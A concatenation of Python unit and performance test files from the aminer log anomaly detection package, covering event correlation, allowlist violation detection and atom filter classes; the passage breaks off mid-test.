self.run_parser_count(False, 60) self.run_parser_count(False, 1000) self.run_parser_count(False, 10000) self.run_parser_count(False, 100000) def test17event_correlation_detector(self): """Start performance tests for EventCorrelationDetector.""" self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(0.5, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(0.1, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 10, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 1, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 0.1, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 1.0, 0.01, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.7, 0.1, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 2000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 10000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 1000, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 2000, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 10, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 100, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 60, 90) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 30, 45) def test18match_filter(self): """Start performance tests for MatchFilter.""" self.run_match_filter(1) self.run_match_filter(1000) self.run_match_filter(100000) def test19event_type_detector(self): """Start performance tests for EventTypeDetector.""" self.run_event_type_detector(None) self.run_event_type_detector(1) self.run_event_type_detector(10) self.run_event_type_detector(100) def test20variable_type_detector(self): """Start performance tests for VariableTypeDetector.""" self.run_variable_type_detector(None) self.run_variable_type_detector(1) self.run_variable_type_detector(10) self.run_variable_type_detector(100) def test21variable_correlation_detector(self): """Start performance tests for VariableCorrelationDetector.""" # The VCD should never been run without restrictions of paths (in ETD or via ignore_list, constraint_list) as the performance is # terrible. # self.run_variable_correlation_detector(None) self.run_variable_correlation_detector(1) self.run_variable_correlation_detector(10) self.run_variable_correlation_detector(100) def test22event_frequency_detector(self): """Start performance tests for EventFrequencyDetector.""" self.run_event_frequency_detector(None) self.run_event_frequency_detector(1) self.run_event_frequency_detector(10) self.run_event_frequency_detector(100) def test23event_frequency_detector(self): """Start performance tests for EventSequenceDetector.""" self.run_event_sequence_detector(1) self.run_event_sequence_detector(10) self.run_event_sequence_detector(100) if __name__ == '__main__': unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/JsonModelElementPerformanceTest.py000066400000000000000000000070431500476301700305640ustar00rootroot00000000000000import unittest from aminer.input.JsonStateMachine import json_machine from unit.TestBase import TestBase from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.input.LogAtom import LogAtom from aminer.AnalysisChild import AnalysisContext from aminer.parsing.MatchContext import MatchContext import time import random from time import process_time from _io import StringIO import timeit import importlib breakout = False data = None def found_json(_data): """Set the breakout variable if the JsonStateMachine finished.""" global breakout breakout = True global data data = _data class JsonModelElementPerformanceTest(TestBase): """These unittests test the performance of the JsonModelElement.""" result_string = "The JsonModelElement could in average handle %d LogAtoms %s\n" result = "" iterations = 10 waiting_time = 1 state = json_machine(found_json) log_atoms = [] @classmethod def tearDownClass(cls): """Run the TestBase tearDownClass method and print the results.""" super(JsonModelElementPerformanceTest, cls).tearDownClass() print("\nwaiting time: %d seconds" % cls.waiting_time) print(cls.result) def setUp(self): """Set up needed variables.""" TestBase.setUp(self) self.output_stream = StringIO() self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream) global breakout breakout = False global data data = None self.state = json_machine(found_json) @staticmethod def run_test(json_me, json_data): for d in json_data: json_me.get_match_element("path", MatchContext(d)) def test1_aminer_demo_data(self): """Run the performance tests with the output of the aminer demo.""" with open("demo/aminerJsonInputDemo/json_logs/aminer.log", "rb") as f: stream_data = f.read() spec = importlib.util.spec_from_file_location("aminer_config", "/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py") aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml("demo/aminerJsonInputDemo/json-aminer-demo.yml") yml_context = AnalysisContext(aminer_config) yml_context.build_analysis_pipeline() json_me = yml_context.atomizer_factory.parsing_model json_data = [] global breakout global data while len(stream_data) > 0: i = 0 for i, char in enumerate(stream_data): self.state = self.state(char) if breakout or self.state is None: json_data.append(stream_data[:i+1]) breakout = False data = None self.state = json_machine(found_json) break stream_data = stream_data[i+1:] results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: #result = self.waiting_time / (timeit.timeit(lambda: self.run_test(json_me, json_data), number=1) / 1) result = self.waiting_time / (timeit.timeit(lambda: self.run_test(json_me, json_data), number=10) / 10) results[z] = int(result * len(json_data)) z = z + 1 avg = avg + result * len(json_data) avg = int(avg / self.iterations) type(self).result = self.result + self.result_string % (avg, results) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/TestBase.py000066400000000000000000000324371500476301700240550ustar00rootroot00000000000000import unittest import os import shutil import logging import sys import errno import inspect from aminer.AminerConfig import KEY_LOG_DIR, DEFAULT_LOG_DIR, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, DEBUG_LOG_NAME,\ KEY_REMOTE_CONTROL_LOG_FILE, KEY_STAT_LOG_FILE, KEY_DEBUG_LOG_FILE, REMOTE_CONTROL_LOG_NAME, DEFAULT_REMOTE_CONTROL_LOG_FILE,\ STAT_LOG_NAME, DEFAULT_STAT_LOG_FILE, DEBUG_LEVEL, load_config, build_persistence_file_name, DEFAULT_DEBUG_LOG_FILE from aminer.AnalysisChild import AnalysisContext from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement from aminer.util import PersistenceUtil from aminer.util import SecureOSFunctions from _io import StringIO def initialize_loggers(aminer_config, aminer_user_id, aminer_grp_id): """Initialize all loggers.""" datefmt = '%d/%b/%Y:%H:%M:%S %z' log_dir = aminer_config.config_properties.get(KEY_LOG_DIR, DEFAULT_LOG_DIR) if log_dir == DEFAULT_LOG_DIR: try: if not os.path.isdir(log_dir): persistence_dir_path = aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir_path) if SecureOSFunctions.base_dir_path == DEFAULT_PERSISTENCE_DIR: relative_path_log_dir = os.path.split(DEFAULT_LOG_DIR)[1] os.mkdir(relative_path_log_dir, dir_fd=persistence_dir_fd) os.chown(relative_path_log_dir, aminer_user_id, aminer_grp_id, dir_fd=persistence_dir_fd, follow_symlinks=False) except OSError as e: if e.errno != errno.EEXIST: msg = 'Unable to create log-directory: %s' % log_dir else: msg = e logging.getLogger(DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) tmp_value = aminer_config.config_properties.get(KEY_REMOTE_CONTROL_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print('%s attribute must not contain a full directory path, but only the filename.' % KEY_REMOTE_CONTROL_LOG_FILE, file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(KEY_STAT_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print('%s attribute must not contain a full directory path, but only the filename.' % KEY_STAT_LOG_FILE, file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(KEY_DEBUG_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print('%s attribute must not contain a full directory path, but only the filename.' % KEY_DEBUG_LOG_FILE, file=sys.stderr) sys.exit(1) log_dir_fd = SecureOSFunctions.secure_open_log_directory(log_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME) rc_logger.setLevel(logging.DEBUG) remote_control_log_file = aminer_config.config_properties.get( KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, DEFAULT_REMOTE_CONTROL_LOG_FILE)) if not remote_control_log_file.startswith(log_dir): remote_control_log_file = os.path.join(log_dir, remote_control_log_file) try: rc_file_handler = logging.FileHandler(remote_control_log_file) os.chown(remote_control_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print('Could not create or open %s: %s. Stopping..' % (remote_control_log_file, e), file=sys.stderr) sys.exit(1) rc_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) rc_logger.addHandler(rc_file_handler) logging.addLevelName(15, "REMOTECONTROL") stat_logger = logging.getLogger(STAT_LOG_NAME) stat_logger.setLevel(logging.INFO) stat_log_file = aminer_config.config_properties.get(KEY_STAT_LOG_FILE, os.path.join(log_dir, DEFAULT_STAT_LOG_FILE)) if not stat_log_file.startswith(log_dir): stat_log_file = os.path.join(log_dir, stat_log_file) try: stat_file_handler = logging.FileHandler(stat_log_file) os.chown(stat_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print('Could not create or open %s: %s. Stopping..' % (stat_log_file, e), file=sys.stderr) sys.exit(1) stat_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(message)s', datefmt=datefmt)) stat_logger.addHandler(stat_file_handler) debug_logger = logging.getLogger(DEBUG_LOG_NAME) if DEBUG_LEVEL == 0: debug_logger.setLevel(logging.ERROR) elif DEBUG_LEVEL == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) debug_log_file = aminer_config.config_properties.get( KEY_DEBUG_LOG_FILE, os.path.join(log_dir, DEFAULT_DEBUG_LOG_FILE)) if not debug_log_file.startswith(log_dir): debug_log_file = os.path.join(log_dir, debug_log_file) try: debug_file_handler = logging.FileHandler(debug_log_file) os.chown(debug_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print('Could not create or open %s: %s. Stopping..' % (debug_log_file, e), file=sys.stderr) sys.exit(1) debug_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) debug_logger.addHandler(debug_file_handler) class TestBase(unittest.TestCase): """This is the base class for all unittests.""" def get_config_file_path(self): """ Get the module name to choose the right config file for parallel execution. Example: logdata-anomaly-miner/aecid-testsuite/unit/analysis/AtomFiltersTest.py - we want to know the directory analysis. """ return os.getcwd()+'/unit/data/parallel_configs/%s_config.py' % inspect.getmodule(self).__file__.split("unit/")[1].split("/")[0] def setUp(self): """Set up all needed variables and remove persisted data.""" PersistenceUtil.persistable_components = [] self.aminer_config = load_config(self.get_config_file_path()) self.analysis_context = AnalysisContext(self.aminer_config) self.output_stream = StringIO() self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream) persistence_dir_name = build_persistence_file_name(self.aminer_config) if os.path.exists(persistence_dir_name): shutil.rmtree(persistence_dir_name) if not os.path.exists(persistence_dir_name): os.makedirs(os.path.join(persistence_dir_name, "log")) initialize_loggers(self.aminer_config, os.getuid(), os.getgid()) if isinstance(persistence_dir_name, str): persistence_dir_name = persistence_dir_name.encode() SecureOSFunctions.secure_open_base_directory(persistence_dir_name, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = True def tearDown(self): """Delete all persisted data after the tests.""" self.aminer_config = load_config(self.get_config_file_path()) persistence_file_name = build_persistence_file_name(self.aminer_config) if os.path.exists(persistence_file_name): shutil.rmtree(persistence_file_name) if not os.path.exists(persistence_file_name): os.makedirs(persistence_file_name) SecureOSFunctions.close_base_directory() def reset_output_stream(self): """Reset the output stream.""" self.output_stream.seek(0) self.output_stream.truncate(0) def compare_match_results(self, data, match_element, match_context, id_, path, match_string, match_object, children): """Compare the results of get_match_element() if match_element is not None.""" self.assertEqual(match_element.path, "%s/%s" % (path, id_)) self.assertEqual(match_element.match_string, match_string) self.assertEqual(match_element.match_object, match_object) if children is None: self.assertIsNone(match_element.children, children) else: self.assertEqual(len(children), len(match_element.children)) for i, child in enumerate(children): self.assertEqual(match_element.children[i].path, child.path) self.assertEqual(match_element.children[i].match_string, child.match_string) self.assertEqual(match_element.children[i].match_object, child.match_object) self.assertIsNone(match_element.children[i].children, children) self.assertEqual(match_context.match_string, match_string) self.assertEqual(match_context.match_data, data[len(match_string):]) def compare_no_match_results(self, data, match_element, match_context): """Compare the results of get_match_element() if match_element is not None.""" self.assertIsNone(match_element, None) self.assertEqual(match_context.match_data, data) class DummyMatchContext: """Dummy class for MatchContext.""" def __init__(self, match_data: bytes): """Initiate the Dummy class.""" self.match_data = match_data self.match_string = b'' def update(self, match_string: bytes): """Update the data.""" self.match_data = self.match_data[len(match_string):] self.match_string += match_string class DummyFixedDataModelElement(ModelElementInterface): """Dummy class for fixed string ModelElements.""" def __init__(self, element_id: str, data: bytes): self.element_id = element_id self.data = data def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" if not match_context.match_data.startswith(self.data): return None match_context.update(self.data) return MatchElement("%s/%s" % (path, self.element_id), self.data, self.data, None) class DummyNumberModelElement(ModelElementInterface): """Dummy class for any data.""" def get_match_element(self, path: str, match_context): for i in range(len(match_context.match_data)): if match_context.match_data[i:i+1] not in b"0123456789": if i == 0: return None match_data = match_context.match_data[:i] match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, int(match_data), None) return MatchElement(f"{path}/{self.element_id}", match_context.match_data, int(match_context.match_data), None) class DummyFirstMatchModelElement(ModelElementInterface): """This class defines a model element to return the match from the the first matching child model within a given list.""" def __init__(self, element_id, children): self.element_id = element_id self.children = children if (children is None) or (None in children): msg = 'Invalid children list' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def get_match_element(self, path, match_context): """@return None when there is no match, MatchElement otherwise.""" current_path = "%s/%s" % (path, self.element_id) match_data = match_context.match_data for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is not None: return child_match match_context.match_data = match_data return None class DummySequenceModelElement(ModelElementInterface): """This class defines an element to find matches that comprise matches of all given child model elements.""" def __init__(self, element_id, children): self.element_id = element_id self.children = children if (children is None) or (None in children): msg = 'Invalid children list' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def get_match_element(self, path, match_context): """ Try to find a match on given data for this model element and all its children. When a match is found, the matchContext is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" start_data = match_context.match_data matches = [] for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is None: match_context.match_data = start_data return None matches += [child_match] return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], matches) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/__init__.py000066400000000000000000000000001500476301700240570ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/000077500000000000000000000000001500476301700236035ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/AllowlistViolationDetectorTest.py000066400000000000000000000216051500476301700323520ustar00rootroot00000000000000import unittest from aminer.analysis.Rules import PathExistsMatchRule from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from unit.TestBase import TestBase from datetime import datetime import time class AllowlistViolationDetectorTest(TestBase): """Unittests for the AllowlistViolationDetector.""" def test1receive_atom(self): """This test case checks if valid inputs are recognized.""" fixed_string = b"fixed String" path_exists_match_rule = PathExistsMatchRule("match/s1", None) path_exists_match_rule2 = PathExistsMatchRule("match/s2", None) t = time.time() allowlist_violation_detector = AllowlistViolationDetector(self.aminer_config, [path_exists_match_rule, path_exists_match_rule2], [ self.stream_printer_event_handler], output_logline=False) fixed_dme = FixedDataModelElement("s1", fixed_string) match_context = MatchContext(fixed_string) match_element = fixed_dme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, allowlist_violation_detector) self.assertTrue(allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") fixed_dme = FixedDataModelElement("s2", fixed_string) match_context = MatchContext(fixed_string) match_element = fixed_dme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, allowlist_violation_detector) self.assertTrue(allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") fixed_dme = FixedDataModelElement("s3", fixed_string) match_context = MatchContext(fixed_string) match_element = fixed_dme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, path_exists_match_rule) self.assertTrue(not allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '%s No allowlisting for current atom\n%s: "None" (%d lines)\n %s\n\n' % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), allowlist_violation_detector.__class__.__name__, 1, "fixed String")) def test2validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" pem_rule = PathExistsMatchRule("match/s1", None) pem_rule2 = PathExistsMatchRule("match/s2", None) allowlist_rules = [pem_rule, pem_rule2] self.assertRaises(ValueError, AllowlistViolationDetector, self.aminer_config, [], [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, ["default"]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, None) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, "") self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, b"Default") self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, True) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, 123) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, 123.3) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, {"id": "Default"}) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, ()) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, set()) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=set()) AllowlistViolationDetector(self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=True) AllowlistViolationDetector(self.aminer_config, allowlist_rules, [], output_logline=True) self.assertRaises(ValueError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list=set()) AllowlistViolationDetector(self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/AtomFiltersTest.py000066400000000000000000000317411500476301700272540ustar00rootroot00000000000000import unittest from aminer.analysis.AtomFilters import SubhandlerFilter, MatchPathFilter, MatchValueFilter from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from datetime import datetime from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class AtomFiltersTest(TestBase): """Unittests for the AtomFilters.""" def test1receive_atom_SubhandlerFilter(self): """Test if log atoms are processed correctly with the SubhandlerFilter and the stop_when_handled flag is working properly.""" expected_string = '%s New path(s) detected\n%s: "None" (%d lines)\n %s: %s\n%s\n%s\n\n' match_path = "fixed/s1" datetime_format_string = "%Y-%m-%d %H:%M:%S" data = b"25000" match_context = DummyMatchContext(data) fdme = DummyFixedDataModelElement("s1", data) match_element = fdme.get_match_element("fixed", match_context) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) other_nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) t = time.time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd) # more than one subhandler can handle the log_atom (stop_when_handled flag is false). subhandler_filter = SubhandlerFilter([nmpd, other_nmpd], False) self.assertTrue(subhandler_filter.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd.__class__.__name__, 1, match_path, data.decode(), f"['{match_path}']", data.decode()) + expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd.__class__.__name__, 1, match_path, data.decode(), f"['{match_path}']", data.decode())) self.reset_output_stream() # SubhandlerFilter stops processing after first subhandler handles the log_atom (stop_when_handled flag is true). subhandler_filter = SubhandlerFilter([nmpd, other_nmpd], True) self.assertTrue(subhandler_filter.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd.__class__.__name__, 1, match_path, data.decode(), f"['{match_path}']", data.decode())) self.reset_output_stream() # atom not handled. subhandler_filter = SubhandlerFilter([], True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd) self.assertFalse(subhandler_filter.receive_atom(log_atom)) def test2add_handler_SubhandlerFilter(self): """Test if new detectors can be added to the SubhandlerFilter.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler],"Default", False) other_nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler],"Default", False) subhandler_filter = SubhandlerFilter([nmpd, other_nmpd], False) self.assertEqual(subhandler_filter.subhandler_list, [(nmpd, False), (other_nmpd, False)]) subhandler_filter.add_handler(nmpd, True) subhandler_filter.add_handler(other_nmpd, False) self.assertEqual(subhandler_filter.subhandler_list, [(nmpd, False), (other_nmpd, False), (nmpd, True), (other_nmpd, False)]) subhandler_filter = SubhandlerFilter([nmpd, other_nmpd], True) self.assertEqual(subhandler_filter.subhandler_list, [(nmpd, True), (other_nmpd, True)]) def test3receive_atom_MatchPathFilter(self): """Test if log atoms are processed correctly with the MatchPathFilter and the stop_when_handled flag is working properly.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) data = b"data" match_context = DummyMatchContext(data) fdme = DummyFixedDataModelElement("s1", data) match_element = fdme.get_match_element("fixed", match_context) t = time.time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd) # There is a path in the dictionary and the handler are not None. The default_parsed_atom_handler is None. match_path_filter = MatchPathFilter([(match_element.get_path(), nmpd)], None) self.assertTrue(match_path_filter.receive_atom(log_atom)) # The searched path is not in the dictionary. The default_parsed_atom_handler is None. match_path_filter = MatchPathFilter([("d1", nmpd)], None) self.assertFalse(match_path_filter.receive_atom(log_atom)) # The searched path is not in the dictionary. The default_parsed_atom_handler is set. match_path_filter = MatchPathFilter([("d1", nmpd)], nmpd) self.assertTrue(match_path_filter.receive_atom(log_atom)) def test4receive_atom_MatchValueFilter(self): """Test if log atoms are processed correctly with the MatchValueFilter and the stop_when_handled flag is working properly.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) other_nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) data = b"data" other_data = b"other data" match_context = DummyMatchContext(data) fdme = DummyFixedDataModelElement("s1", data) match_element = fdme.get_match_element("fixed", match_context) t = time.time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd) # A target_value and a handler, which can handle the match_object is found. match_value_filter = MatchValueFilter(match_element.get_path(), {fdme.data: nmpd}, other_nmpd) self.assertTrue(match_value_filter.receive_atom(log_atom)) # No default handler is used. other_match_context = DummyMatchContext(other_data) other_fdme = DummyFixedDataModelElement("d1", other_data) other_match_element = other_fdme.get_match_element("fixed", other_match_context) log_atom = LogAtom(other_fdme.data, ParserMatch(other_match_element), t, other_nmpd) self.assertTrue(match_value_filter.receive_atom(log_atom)) # No target_value was found in the dictionary. log_atom = LogAtom(other_data, None, t, nmpd) self.assertFalse(match_value_filter.receive_atom(log_atom)) def test5validate_parameters_SubhandlerFilter(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler],"Default", False) self.assertRaises(TypeError, SubhandlerFilter, [""], True) self.assertRaises(TypeError, SubhandlerFilter, [b""], True) self.assertRaises(TypeError, SubhandlerFilter, [True], True) self.assertRaises(TypeError, SubhandlerFilter, [None], True) self.assertRaises(TypeError, SubhandlerFilter, [123], True) self.assertRaises(TypeError, SubhandlerFilter, [123.2], True) self.assertRaises(TypeError, SubhandlerFilter, [{"id": "Default"}], True) self.assertRaises(TypeError, SubhandlerFilter, [["Default"]], True) self.assertRaises(TypeError, SubhandlerFilter, [set()], True) self.assertRaises(TypeError, SubhandlerFilter, [()], True) self.assertRaises(TypeError, SubhandlerFilter, [(nmpd, False)], True) self.assertRaises(TypeError, SubhandlerFilter, [nmpd], "") self.assertRaises(TypeError, SubhandlerFilter, [nmpd], None) self.assertRaises(TypeError, SubhandlerFilter, [nmpd], b"Default") self.assertRaises(TypeError, SubhandlerFilter, [nmpd], 123) self.assertRaises(TypeError, SubhandlerFilter, [nmpd], 123.2) self.assertRaises(TypeError, SubhandlerFilter, [nmpd], {"id": "Default"}) 